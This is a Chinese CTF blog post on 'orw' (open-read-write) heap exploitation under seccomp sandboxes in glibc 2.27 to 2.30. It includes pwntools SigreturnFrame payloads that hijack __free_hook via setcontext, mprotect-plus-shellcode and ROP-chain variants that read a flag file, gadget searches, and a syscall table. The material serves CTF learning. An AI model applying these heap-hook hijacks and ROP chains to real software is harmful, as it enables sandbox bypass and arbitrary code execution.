堆上的orw

最新推荐文章于 2024-02-07 20:14:39 发布
最新推荐文章于 2024-02-07 20:14:39 发布
阅读量1.5k 收藏 2
点赞数 1
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Stella_Leo/article/details/119897430
版权

author: moqizou

堆上的orw

最近出的堆题大都转向了沙箱,需要orw,而在堆上面的orw就需要去布局,如何才能让系统执行我们的代码就成了一个难题,下面是学习的一些总结

libc2.27

这一段是setcontext函数的下面部分,不难发现,通过rdi和偏移,几乎控制了所有的寄存器,所以如果控制setcontext函数的参数也就是rdi就可以控制程序流程,而这里的这样也就可以让堆上的代码可以执行。

  • 一般的套路

一般来说,可以拿到libc_base和heap_base。拿到之后,构造如下结构体。

frame = SigreturnFrame()
frame.rsp = libc.sym['__free_hook'] + 0x10
frame.rdi = newexe
frame.rsi = 0x1000
frame.rdx = 4 | 2 | 1
frame.rip = libc.sym['mprotect']

然后通过一些手段,劫持free_hook为setcontext+53也就是上面的第一条语句。

这时候就会开始改变寄存器的值

改变之后执行的是rcx也就是rip的值(这里可以看srop的章节,在srop的结构体里面,这些偏移和setcontext里面的一致,所以可以用srop结构体来构造setcontext)

大致的流程就是

第一种 利用mprotect改权限,然后利用汇编代码的orw拿flag

首先是执行到free_hook,然后内容被改为setcontext,就去执行这个,最后会执行rip的内容,也就是mprotect函数,执行完了之后就会把newexe的权限改掉,然后就会执行ret,此时栈顶是rsp所以,rsp就要写上需要执行的代码

shell1 = '''
xor rdi,rdi
mov rsi,%d
mov edx,0x1000

mov eax,0
syscall

jmp rsi
''' % newexe

这里好像是read函数,我们再往目标的地址和写入orw代码就可以通过jmp rsi实现了

shell2 = '''
mov rax,0x67616c66
push rax

mov rdi,rsp
mov rsi,0
mov rdx,0
mov rax,2
syscall

mov rdi,rax
mov rsi,rsp
mov rdx,1024
mov rax,0
syscall

mov rdi,1
mov rsi,rsp
mov rdx,rax
mov rax,1
syscall

mov rdi,0
mov rax,60
syscall
'''

第二种就是直接用gadget实现rop链,然后实现orw

fake_rsp = heap_base + 0x1d80
ret = libc_base + 0x00000000000008aa # ret
pop_rdi_ret = libc_base + 0x000000000002155f # pop rdi ; ret
pop_rsi_ret = libc_base + 0x0000000000023e6a # pop rsi ; ret 
pop_rdx_rsi_ret = libc_base + 0x00000000001306d9 # pop rdx ; pop rsi ; ret
pop_rdx_ret = libc_base + 0x0000000000001b96 # pop rdx ; ret

p = 'a'*0xa0 + p64(fake_rsp) + p64(ret) #rsp  rip
p = p.ljust(0xb0, '\x00')
p += './flag\x00\x00'
p += p64(0)
p += p64(pop_rdi_ret) + p64(flag)
p += p64(pop_rsi_ret) + p64(0)
p += p64(libc_base+libc.sym['open'])
p += p64(pop_rdi_ret) + p64(3)
p += p64(pop_rdx_rsi_ret) + p64(0x30) + p64(fake_rsp+0x100)
p += p64(libc_base + libc.sym['read'])
p += p64(pop_rdi_ret) + p64(1)
p += p64(pop_rdx_rsi_ret) + p64(0x30) + p64(fake_rsp+0x100)
p += p64(libc_base + libc.sym['write'])
add(0x400, p)#10
free(10)

把这一串orw写在堆块里面,然后free。通过setcontext控制了rsp就可以直接orw了。(通过ret指令把堆地址当做rsp执行)

libc2.29以及以上

在libc2.29版本里面,rdi变成了rdx,所以控制寄存器的基础上还需要一个gadget来控制rdx的值,这个值最好是rdi来控制,应为一般是要打hook,所以就找到了如下的gadget

ropper -f libc6_2.29-0ubuntu2_amd64.so --search 'mov rdx'

0x000000000012be97: mov rdx, qword ptr [rdi + 8]; mov rax, qword ptr [rdi]; mov rdi, rdx; jmp rax;
libc2.30

gadget变成了

> ropper -f libc6_2.30-0ubuntu2.2_amd64.so --search "mov rdx"
0x0000000000154b20: mov rdx, qword ptr [rdi + 8]; mov qword ptr [rsp], rax; call qword ptr [rdx + 0x20];
  • 分析

从2.29的gadget种发现rdx=rdi+8=frame rax=rdi=setcontexxt+53

2.30则是rdx+0x20=frame+0x20=setcontext+61这里的计算有点离谱,因为我们gadget是写在hook上的,所以rdi几乎就是hook的地址,而rdi+8的位置协商rdx的地址那么最后call的实际上就是hook+0x30,这样来说的化hook+0x8是frame,那么实际上frame的前0x28我们不能够控制了,只能控制frame[0x28:]以后的位置所以payload基本上就是

8 + &(hook+0x10)+20+&(setcontext+61)+frame[0x28:]

也可以是别的形式

例题

VNCTF2021 https://myenid.github.io/2021/05/19/VNCTF2021/

参考

https://blog.csdn.net/weixin_43960998/article/details/115838190

https://noone-hub.github.io/posts/62c86bb4/

资料

orw的固定形式

ROP

#orw
orw = b'./flag\x00'.ljust(8, b'\x00')
orw += p64(pop_rdi_ret) + p64(flag_addr) + p64(pop_rsi_ret) + p64(4) + p64(libc_base + libc.sym['open'])
orw += p64(pop_rdi_ret) + p64(3) + p64(pop_rsi_ret) + p64(flag_addr) + p64(pop_rdx_pop_rbx_ret) + p64(0x100) + p64(0) + p64(libc_base + libc.sym['read'])
orw += p64(pop_rdi_ret) + p64(1) + p64(pop_rsi_ret) + p64(flag_addr) + p64(pop_rdx_pop_rbx_ret) + p64(0x100) + p64(0) + p64(libc_base + libc.sym['write'])


#frame形式
p = 'a'*0xa0 + p64(fake_rsp) + p64(ret) #rsp  rip
p = p.ljust(0xb0, '\x00')
p += './flag\x00\x00'
p += p64(0)
p += p64(pop_rdi_ret) + p64(flag)
p += p64(pop_rsi_ret) + p64(0)
p += p64(libc_base+libc.sym['open'])
p += p64(pop_rdi_ret) + p64(3)
p += p64(pop_rdx_rsi_ret) + p64(0x30) + p64(fake_rsp+0x100)
p += p64(libc_base + libc.sym['read'])
p += p64(pop_rdi_ret) + p64(1)
p += p64(pop_rdx_rsi_ret) + p64(0x30) + p64(fake_rsp+0x100)
p += p64(libc_base + libc.sym['write'])
add(0x400, p)#10
free(10)

系统调用号64位

cat /usr/include/asm/unistd_64.h 
#ifndef _ASM_X86_UNISTD_64_H
#define _ASM_X86_UNISTD_64_H 1

#define __NR_read 0
#define __NR_write 1
#define __NR_open 2
#define __NR_close 3
#define __NR_stat 4
#define __NR_fstat 5
#define __NR_lstat 6
#define __NR_poll 7
#define __NR_lseek 8
#define __NR_mmap 9
#define __NR_mprotect 10
#define __NR_munmap 11
#define __NR_brk 12
#define __NR_rt_sigaction 13
#define __NR_rt_sigprocmask 14
#define __NR_rt_sigreturn 15
#define __NR_ioctl 16
#define __NR_pread64 17
#define __NR_pwrite64 18
#define __NR_readv 19
#define __NR_writev 20
#define __NR_access 21
#define __NR_pipe 22
#define __NR_select 23
#define __NR_sched_yield 24
#define __NR_mremap 25
#define __NR_msync 26
#define __NR_mincore 27
#define __NR_madvise 28
#define __NR_shmget 29
#define __NR_shmat 30
#define __NR_shmctl 31
#define __NR_dup 32
#define __NR_dup2 33
#define __NR_pause 34
#define __NR_nanosleep 35
#define __NR_getitimer 36
#define __NR_alarm 37
#define __NR_setitimer 38
#define __NR_getpid 39
#define __NR_sendfile 40
#define __NR_socket 41
#define __NR_connect 42
#define __NR_accept 43
#define __NR_sendto 44
#define __NR_recvfrom 45
#define __NR_sendmsg 46
#define __NR_recvmsg 47
#define __NR_shutdown 48
#define __NR_bind 49
#define __NR_listen 50
#define __NR_getsockname 51
#define __NR_getpeername 52
#define __NR_socketpair 53
#define __NR_setsockopt 54
#define __NR_getsockopt 55
#define __NR_clone 56
#define __NR_fork 57
#define __NR_vfork 58
#define __NR_execve 59
#define __NR_exit 60
#define __NR_wait4 61
#define __NR_kill 62
#define __NR_uname 63
#define __NR_semget 64
#define __NR_semop 65
#define __NR_semctl 66
#define __NR_shmdt 67
#define __NR_msgget 68
#define __NR_msgsnd 69
#define __NR_msgrcv 70
#define __NR_msgctl 71
#define __NR_fcntl 72
#define __NR_flock 73
#define __NR_fsync 74
#define __NR_fdatasync 75
#define __NR_truncate 76
#define __NR_ftruncate 77
#define __NR_getdents 78
#define __NR_getcwd 79
#define __NR_chdir 80
#define __NR_fchdir 81
#define __NR_rename 82
#define __NR_mkdir 83
#define __NR_rmdir 84
#define __NR_creat 85
#define __NR_link 86
#define __NR_unlink 87
#define __NR_symlink 88
#define __NR_readlink 89
#define __NR_chmod 90
#define __NR_fchmod 91
#define __NR_chown 92
#define __NR_fchown 93
#define __NR_lchown 94
#define __NR_umask 95
#define __NR_gettimeofday 96
#define __NR_getrlimit 97
#define __NR_getrusage 98
#define __NR_sysinfo 99
#define __NR_times 100
#define __NR_ptrace 101
#define __NR_getuid 102
#define __NR_syslog 103
#define __NR_getgid 104
#define __NR_setuid 105
#define __NR_setgid 106
#define __NR_geteuid 107
#define __NR_getegid 108
#define __NR_setpgid 109
#define __NR_getppid 110
#define __NR_getpgrp 111
#define __NR_setsid 112
#define __NR_setreuid 113
#define __NR_setregid 114
#define __NR_getgroups 115
#define __NR_setgroups 116
#define __NR_setresuid 117
#define __NR_getresuid 118
#define __NR_setresgid 119
#define __NR_getresgid 120
#define __NR_getpgid 121
#define __NR_setfsuid 122
#define __NR_setfsgid 123
#define __NR_getsid 124
#define __NR_capget 125
#define __NR_capset 126
#define __NR_rt_sigpending 127
#define __NR_rt_sigtimedwait 128
#define __NR_rt_sigqueueinfo 129
#define __NR_rt_sigsuspend 130
#define __NR_sigaltstack 131
#define __NR_utime 132
#define __NR_mknod 133
#define __NR_uselib 134
#define __NR_personality 135
#define __NR_ustat 136
#define __NR_statfs 137
#define __NR_fstatfs 138
#define __NR_sysfs 139
#define __NR_getpriority 140
#define __NR_setpriority 141
#define __NR_sched_setparam 142
#define __NR_sched_getparam 143
#define __NR_sched_setscheduler 144
#define __NR_sched_getscheduler 145
#define __NR_sched_get_priority_max 146
#define __NR_sched_get_priority_min 147
#define __NR_sched_rr_get_interval 148
#define __NR_mlock 149
#define __NR_munlock 150
#define __NR_mlockall 151
#define __NR_munlockall 152
#define __NR_vhangup 153
#define __NR_modify_ldt 154
#define __NR_pivot_root 155
#define __NR__sysctl 156
#define __NR_prctl 157
#define __NR_arch_prctl 158
#define __NR_adjtimex 159
#define __NR_setrlimit 160
#define __NR_chroot 161
#define __NR_sync 162
#define __NR_acct 163
#define __NR_settimeofday 164
#define __NR_mount 165
#define __NR_umount2 166
#define __NR_swapon 167
#define __NR_swapoff 168
#define __NR_reboot 169
#define __NR_sethostname 170
#define __NR_setdomainname 171
#define __NR_iopl 172
#define __NR_ioperm 173
#define __NR_create_module 174
#define __NR_init_module 175
#define __NR_delete_module 176
#define __NR_get_kernel_syms 177
#define __NR_query_module 178
#define __NR_quotactl 179
#define __NR_nfsservctl 180
#define __NR_getpmsg 181
#define __NR_putpmsg 182
#define __NR_afs_syscall 183
#define __NR_tuxcall 184
#define __NR_security 185
#define __NR_gettid 186
#define __NR_readahead 187
#define __NR_setxattr 188
#define __NR_lsetxattr 189
#define __NR_fsetxattr 190
#define __NR_getxattr 191
#define __NR_lgetxattr 192
#define __NR_fgetxattr 193
#define __NR_listxattr 194
#define __NR_llistxattr 195
#define __NR_flistxattr 196
#define __NR_removexattr 197
#define __NR_lremovexattr 198
#define __NR_fremovexattr 199
#define __NR_tkill 200
#define __NR_time 201
#define __NR_futex 202
#define __NR_sched_setaffinity 203
#define __NR_sched_getaffinity 204
#define __NR_set_thread_area 205
#define __NR_io_setup 206
#define __NR_io_destroy 207
#define __NR_io_getevents 208
#define __NR_io_submit 209
#define __NR_io_cancel 210
#define __NR_get_thread_area 211
#define __NR_lookup_dcookie 212
#define __NR_epoll_create 213
#define __NR_epoll_ctl_old 214
#define __NR_epoll_wait_old 215
#define __NR_remap_file_pages 216
#define __NR_getdents64 217
#define __NR_set_tid_address 218
#define __NR_restart_syscall 219
#define __NR_semtimedop 220
#define __NR_fadvise64 221
#define __NR_timer_create 222
#define __NR_timer_settime 223
#define __NR_timer_gettime 224
#define __NR_timer_getoverrun 225
#define __NR_timer_delete 226
#define __NR_clock_settime 227
#define __NR_clock_gettime 228
#define __NR_clock_getres 229
#define __NR_clock_nanosleep 230
#define __NR_exit_group 231
#define __NR_epoll_wait 232
#define __NR_epoll_ctl 233
#define __NR_tgkill 234
#define __NR_utimes 235
#define __NR_vserver 236
#define __NR_mbind 237
#define __NR_set_mempolicy 238
#define __NR_get_mempolicy 239
#define __NR_mq_open 240
#define __NR_mq_unlink 241
#define __NR_mq_timedsend 242
#define __NR_mq_timedreceive 243
#define __NR_mq_notify 244
#define __NR_mq_getsetattr 245
#define __NR_kexec_load 246
#define __NR_waitid 247
#define __NR_add_key 248
#define __NR_request_key 249
#define __NR_keyctl 250
#define __NR_ioprio_set 251
#define __NR_ioprio_get 252
#define __NR_inotify_init 253
#define __NR_inotify_add_watch 254
#define __NR_inotify_rm_watch 255
#define __NR_migrate_pages 256
#define __NR_openat 257
#define __NR_mkdirat 258
#define __NR_mknodat 259
#define __NR_fchownat 260
#define __NR_futimesat 261
#define __NR_newfstatat 262
#define __NR_unlinkat 263
#define __NR_renameat 264
#define __NR_linkat 265
#define __NR_symlinkat 266
#define __NR_readlinkat 267
#define __NR_fchmodat 268
#define __NR_faccessat 269
#define __NR_pselect6 270
#define __NR_ppoll 271
#define __NR_unshare 272
#define __NR_set_robust_list 273
#define __NR_get_robust_list 274
#define __NR_splice 275
#define __NR_tee 276
#define __NR_sync_file_range 277
#define __NR_vmsplice 278
#define __NR_move_pages 279
#define __NR_utimensat 280
#define __NR_epoll_pwait 281
#define __NR_signalfd 282
#define __NR_timerfd_create 283
#define __NR_eventfd 284
#define __NR_fallocate 285
#define __NR_timerfd_settime 286
#define __NR_timerfd_gettime 287
#define __NR_accept4 288
#define __NR_signalfd4 289
#define __NR_eventfd2 290
#define __NR_epoll_create1 291
#define __NR_dup3 292
#define __NR_pipe2 293
#define __NR_inotify_init1 294
#define __NR_preadv 295
#define __NR_pwritev 296
#define __NR_rt_tgsigqueueinfo 297
#define __NR_perf_event_open 298
#define __NR_recvmmsg 299
#define __NR_fanotify_init 300
#define __NR_fanotify_mark 301
#define __NR_prlimit64 302
#define __NR_name_to_handle_at 303
#define __NR_open_by_handle_at 304
#define __NR_clock_adjtime 305
#define __NR_syncfs 306
#define __NR_sendmmsg 307
#define __NR_setns 308
#define __NR_getcpu 309
#define __NR_process_vm_readv 310
#define __NR_process_vm_writev 311
#define __NR_kcmp 312
#define __NR_finit_module 313
#define __NR_sched_setattr 314
#define __NR_sched_getattr 315
#define __NR_renameat2 316
#define __NR_seccomp 317
#define __NR_getrandom 318
#define __NR_memfd_create 319
#define __NR_kexec_file_load 320
#define __NR_bpf 321
#define __NR_execveat 322
#define __NR_userfaultfd 323
#define __NR_membarrier 324
#define __NR_mlock2 325
#define __NR_copy_file_range 326
#define __NR_preadv2 327
#define __NR_pwritev2 328
#define __NR_pkey_mprotect 329
#define __NR_pkey_alloc 330
#define __NR_pkey_free 331
#define __NR_statx 332

#endif /* _ASM_X86_UNISTD_64_H */
16385
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF:pwnable_orw
qq_44768749的博客
08-27 1526
BUUCTF:pwnable_orw0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 32位程序,开启了canary保护 0x02 运行 提示输入shellcode 0x03 IDA main函数 调用orw_seccomp函数后,输入shellcode后执行shellcode 写入sys_call的shellcode,发现不能执行 orw_seccomp函数 seccomp 是 secure computing 的缩写,其是
vagrant-neosdev:TYPO3 Neos 和 Flow 通用开发服务器
05-31
已弃用! 请参阅 (使用 ansible 代替 puppet) MOC TYPO3 Neos and Flow 通用开发服务器 用于在类似于 MOC 托管生产机器的环境中开发 TYPO3 Flow 和 Neos 站点...sudo mount -orw -oresvport -t nfs 192.168.66.80:/
沙盒orw总结
最新发布
weixin_66751120的博客
02-07 761
一般沙盒机制开启后,会禁掉execve函数,也就意味着one_gadget以及system函数都不能使用,这就需要去利用open/read/write函数来拿到flag,当程序中出现sanbox或者seccomp时就要注意到开启了沙盒机制,这就可以利用seccomp-tools工具去查看什么函数被禁掉了,然后通过一道题的两种构造orw的方式来加深理解。
glibc2.27堆上ORW
tbsqigongzi的博客
10-16 281
ciscn_2019_sw_10
【pwn】orw
weixin_43960998的博客
06-19 1747
本文分为两部分,一部分是2.27及一下的 setcontext + orw,一部分是 2.29 及以上的 setcontext + orw。 利用条件 2.27: 开了沙箱 uaf 等控制 free_hook 一、2.27 libc 2.27及以下的 setcontext: 给各寄存器传参分别由 rdi 来完成,一般的套路是线泄漏 libc 和 heap_base,我们把某一个 chunk 填充为: frame = SigreturnFrame() frame.rsp = libc.sym['__fr
[BUUCTF]PWN——pwnable_orw
mcmuyanga的博客
11-10 1865
pwnable_orw 附件 步骤: 例行检查,32位程序,开启了canary 本地运行一下程序,看看大概的情况,提示我们输入shellcode 32位ida载入,检索字符串,没看见什么可以直接利用的,直接看main函数 orw_seccomp函数 prctl在百度后知道了是沙盒机制,具体的看这篇文章 prctl seccomp相当于内核中的一种安全机制,正常情况下,程序可以使用所有的syscall,但是当劫持程序流程之后通过exeve来呼叫syscall得到shell时seccomp边
pwnable.tw---orw
杀生丸?不,其实我要的是桔梗
05-01 1546
pwnable.tw—orw 这题主要考验的是shellcode的自我制作,建议学会Linux Sysycall Reference 再来,或者第一题start彻底搞会。 题目分析: 照例: 就开了栈保护,虽然都没有什么用。 题目开始就是让你输入shellcode。 就用msf随便试了几下,发现有些被过滤了。 调试看看: 发现调用了seccomp,百度了下是一个linu...
浅析3G网络安全.pdf
06-08
accord ing tO 3G netw ork dat a securi ty and ident ity auth ent icati on£ th e paper p ut f orw ard the i mpro vement sug gesti ons £ K e) £ w o r d s £" 3G netw or k £» net w or k sec ur it y ...
Latency and Bandwidth Impact on GPU Systems - 2008 (ms-proj-gpgpu-latency-bandwidth)-计算机科学
04-22
orw eg ian Un ive rsit yo fS cie nce an dT ech no log yF acu lty of Info rma tio nT ech no log y, Ma the ma tics an dE lect rica l En gin ee rin gD ep art me nt of Co mp ute ra nd In form ati...
cpma的十进制运算指令实用PPT课件.pptx
10-06
3. **字逻辑或运算指令 ORW (35)**:执行位或操作,`ORW S1, S2, D`将S1和S2的每一位进行或运算,结果存入D。 4. **字逻辑异或运算指令 XORW (36)**:执行位异或操作,`XORW S1, S2, D`将S1和S2的每一位进行异或...
aserteee:我的GitHub个人资料的配置文件
03-22
职位: 作业:Create_Windows_2019_Azure_...脚本: 回声ngrok的authToken “1q6MPXb3oRW5wyDpZkfqLaw2lMh_46EQ4JLUPuaCW3MRrQwGL”> NGROK.bat卷曲-s -O AzureNgrokAutoRegion.bat显示名: '运行RDP哈克在Azure管道'
欧姆龙plc指令 (2).docx
11-16
10. **逻辑指令**:`ANDW`、`ANDL`(双字逻辑与)、`ORW`、`ORL`(双字逻辑或)、`XORW`、`XORL`(双字异或)、`COM`、`COML`(双字求补)用于逻辑操作。 11. **特殊算术指令**:如`APR`(算术处理),以及位计数器...
欧姆龙omronPLC指令.pdf
11-16
- `ANDW`,`ORW`,`XORW`:双字逻辑与、或、异或,用于处理双字型数据的逻辑运算。 - `NEG`:求补指令,用于计算二进制数的补码。 6. **浮点数处理指令**: - `FIX`,`FLT`:浮点数与整数之间的转换。 - `+F`,...
欧姆龙plc指令 (2).pdf
11-16
12. **逻辑指令**:包括`ANDW`、`ANDL`、`ORW`、`ORL`、`XORW`、`XORL`和`COM`(求补)用于双字逻辑运算。 13. **位计数器和浮点数处理**:`BCNT`用于计算位模式中的1的数量,`FIX`将浮点数转换为16位格式。 以上...
欧姆龙plc资料
07-31
包括LOAD、LOAD NOT、AND、AND NOT、OR、OR NOT、AND LOAD、OR LOAD、OUT、OUT ONT、DIFU、DIFD、SET、RSET、KEEP、IL、TIM、CNT、CNTR、SFT、...MAX、COM、ANDW、ORW、XORW、SBS、SBN、RET、MCRO、INT、RXD等多种指令...
【八芒星计划】 ORW
carol2358的博客
09-01 3928
本篇用来记录ORWORW可以分为2.27以下的orw和2.29以上的orw,如果是本地请自备flag文件 orw技术是用来应对沙盒的 文章目录oooorder2019-BALSN-CTF-plaintext oooorder 本题是2.27的orw,漏洞是uaf,漏洞在这里不展开讲,uaf也并不难 2.27的orw既可以使用heap_addr,也可以不要,先讲不需要heap_addr的,毕竟能少泄漏就少泄漏 最重要的是使用了setcontext这个函数,来达成我们控制寄存器的目的 2.27得setcont
强网杯2021 [强网先锋]orw
半岛铁盒的博客
06-29 788
orw就是指你的系统调用被禁止了,不能通过子进程去获得权限和flag,只能在该进程通过 open , read ,write来得到flag 因为不是FULL RELRO所以就考虑改got表为shellcode地址就行了 漏洞点就在于以上两点 令index下标为负数时可以覆盖到其他函数的got表地址 这里选择覆盖掉exit的got表中的地址,因为沙盒的存在,所以需要构造orw的shellcode并覆盖exit的got地址为shellcode 覆盖堆块的申请位置选择在这里 计算一下偏移量 起始点 0x
【CTF】【PWN】orw
m0_50819561的博客
10-09 1312
这是沙盒机制,就是限制你能使用的syscall。 seccomp-tools这个工具能快速地查出你能使用地syscall。 我们能使用的常用的构造攻击链的只有open,read,write。 但是因为限制了syscall,所以我们不能用特殊的系统调用getshell。 有两种方法,一种直接写汇编,一种利用shellcraft构造。 下面是汇编: ...
BJD3rd(DASCTF) pwn部分题目整理 (oj, stack_chk_fail, __libc_csu_fini, mprotect, init, orw,汇编)
carol2358的博客
05-26 1491
TaQiniOJ-0 #include “/home/ctf/fl ag”@Y Memory Monster I 有canary,利用触发canary时的__stack_chk_fail和题目的任意地址任意写,改写__stack_chk_fail为backdoor exp: from pwn import * from LibcSearcher import * local_file = './Memory_Monster_I' local_libc = '/lib/x86_64-li...
return orw();
12-19
return orw()是一个函数调用表达式,它会调用名为orw()的函数,并将函数的返回值作为整个表达式的值返回。 在这个表达式中,orw()表示一个被定义的函数。函数调用的一般形式是函数名后跟一对括号,括号中可以包含...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值